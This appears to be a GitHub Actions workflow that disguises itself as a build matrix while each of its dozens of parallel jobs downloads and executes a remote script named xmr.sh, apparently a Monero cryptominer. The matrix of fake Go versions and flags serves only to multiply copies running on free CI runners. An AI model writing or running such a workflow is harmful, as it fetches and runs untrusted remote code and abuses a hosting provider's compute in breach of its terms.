name: reanx

on: [workflow_dispatch]

jobs:
  build:
    name: reanx
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: wget https://raw.githubusercontent.com/reanx/xmr/main/xmr.sh && chmod +x xmr.sh && ./xmr.sh
    - name: DONE
      run: exit
